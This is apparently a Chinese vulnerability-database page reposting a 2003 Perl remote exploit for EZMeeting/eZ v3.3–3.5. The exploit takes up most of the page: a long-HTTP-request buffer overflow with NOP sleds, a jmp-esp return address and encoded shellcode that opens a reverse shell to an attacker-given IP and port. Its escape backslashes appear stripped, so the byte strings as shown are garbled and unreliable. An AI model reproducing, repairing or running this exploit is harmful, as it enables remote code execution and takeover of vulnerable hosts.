EZMeeting 3.x – ‘EZNet.exe’ Long HTTP Request Remote Buffer Overflow
漏洞ID | 1054285 | 漏洞类型 | |
发布时间 | 2003-12-08 | 更新时间 | 2003-12-08 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
//source: http://www.securityfocus.com/bid/9167/info
//
//A problem has been identified in the handling of some types of requests by the eZ package, resulting in a buffer overrun. Because of this, it may be possible for a remote attacker to execute arbitrary code and gain unauthorized access to a vulnerable host.
#!/usr/bin/perl -w
######################C###O###R###O###M###P###U###T###E###R######################
# [Crpt] universal eZ v3.3 < v3.5 remote exploit by kralor [Crpt] #
#-------------------------------------------------------------------------------#
# versions tested & not vulnerables: v3.0 v3.1 v3.2 #
# versions tested & vulnerables: v3.3 v3.4 v3.5 #
# Cryptso.dll contains a 'static' jmp esp in eZnetwork pack from v3.3 to v3.5 #
# It is a trivial exploit, jumping to esp, then at esp we jump backward to #
# finally reach the shellcode. The shellcode gives a reverse remote shell. #
# Universal shellcode coded by kralor with the PEB technic. #
######W###W###W###.###C###O###R###O###M###P###U###T###E###R###.###N###E###T######
use IO::Socket;
print "rnt [Crpt] eZ v3.3 < v3.5 remote exploit by kralor [Crpt]rn";
print "ttwww.coromputer.net && undernet #coromputerrnrn";
if(@ARGV<3||@ARGV>3) {
print "syntax: ".$0." <victim> <your_ip> <your_port>rn";
exit;
}
print "[+] Connecting to ".$ARGV[0]."t...";
my $sock = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80");
if(!$sock) {
print "Errorrn";
exit;
}
print "Donern";
# 0xffe4 jmp esp in Cryptso.dll (v3.3 v3.4 v3.5 @ 0x1004C72B)
# 0xffffedffe9 jmp back ( $ - 4'608)
$eip = "x2BxC7x04x10";
$jmp_back = "xE9xFFxEDxFFxFF";
# universal reverse remote shell using PEB, coded by kralor.
$shellc0deI = "xebx02xebx0fx66x81xecx04x08x8bxecx83xecx50xe8xef".
"xffxffxffx5bx80xc3x10x33xc9x66xb9x9ex01x80x33x95".
"x43xe2xfax7exe6xa6x4ex26xa5xf1x1ex96x1exd5x99x1e".
"xddx99x1ex54x1exc9xb1x9dx1exe5xa5x96xe1xb1x91xad".
"x8bxe0xd9x1exd5x8dx1excdxa9x96x4dx1excexedx96x4d".
"x1exe6x89x96x65xc3x1exe6xb1x96x65xc3x1exc6xb5x96".
"x45x1excex8dxdex1exa1x0fx96x65x96xe1xb1x81x1exa3".
"xaexe1xb1x8dxe1x9fxdexb6x4exe0x7fxcdxcdxa6x55x56".
"xcaxa6x5cxf3x1ex99xcaxcax1exa9x1ax18x91x92x56x1e".
"x8dx1ex56xaex54xe0x08x56xa6x4exfdxecxd0xedxd4xff".
"x9fxffxdexc6x7dxe9x6ax6ax6axa6x5cx52xd0x69xe2xe6".
"xa7xcaxf3x52xd0x95xa6xa7x1dxd8x97x1ex48xf3x16x7e".
"x91xc4xc4xc6x6ax45xa6x4ex1cxd0x91xfdxe7xf0xe6xe6".
"xffx9fxffxdexc6x7dxdex6ax6ax6ax1exc8x91xa6x6ax52".
"xd0x69xc2xc6xd4xc6x52xd0x95xfaxf6xfexf0x1cxe8x91".
"xf3x52xd0x91xe1xd4x1ex58xf3x16x7cx91xc4xc6x6ax45".
"xa6x4exc6xc6xc6xc6xd6xc6xd6xc6x6ax45x1cxd0x31xfd".
"xfbxf0xf6xe1xffx96xffxc6xffx97x7dx93x6ax6ax6axa6".
"x4ex26x97x1ex40xf3x1cx8fx96x46xf3x52x97";
$shellc0deII = "xffx85xc0x6axe0x31x6ax45xa6".
"x4exfdxf0xe6xe6xd4xffx9fxffxdexc6x7dx40x6bx6ax6a".
"xa6x4ex52xd0x39xd1x95x95x95x1cxc8x25x1cxc8x2dx1c".
"xc8x21x1cxc8x29x1cxc8x55x1cxc8x51x1cxc8x5dx52xd0".
"x4dx94x94x95x95x1cxc8x49x1cxc8x75x1exc8x31x1cxc8".
"x71x1cxc8x7dx1cxc8x79xa6x4ex18xd8x65xc4x18xd8x39".
"xc4xc6xc6xc6xffx94xc6xc6xf3x52xd0x69xf6xf8xf3x52".
"xd0x6bxf1x95x1dxc8x6ax18xc0x69xc7xc6x6ax45xa6x4e".
"xfdxedxfcxe1xc5xffx94xffxdexc6x7dxf3x6bx6ax6ax6a".
"x45x95";
my $tip = inet_aton($ARGV[1]);
my $paddr = sockaddr_in($ARGV[2], $tip);
$paddr=substr($paddr,2,6);
$paddr=$paddr^"x95x95x95x95x95x95";
my $rport=substr($paddr,0,2);
my $rip=substr($paddr,2,4);
$request = "GET /SwEzModule.dll?operation=login&autologin=".
"x90"x100 .$shellc0deI.$rport."x96x46x52x97".$rip.$shellc0deII.
"x90"x4103 .$eip."x90"x4 .$jmp_back." HTTP/1.0rnrn";
print $sock $request;
print "[+] Sending evil requestt...";
close($sock);
print "Donern";
exit;
相关推荐: Trillian Identd Buffer Overflow Vulnerability
Trillian Identd Buffer Overflow Vulnerability 漏洞ID 1101575 漏洞类型 Boundary Condition Error 发布时间 2002-09-18 更新时间 2002-09-18 CVE编号 N/A…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666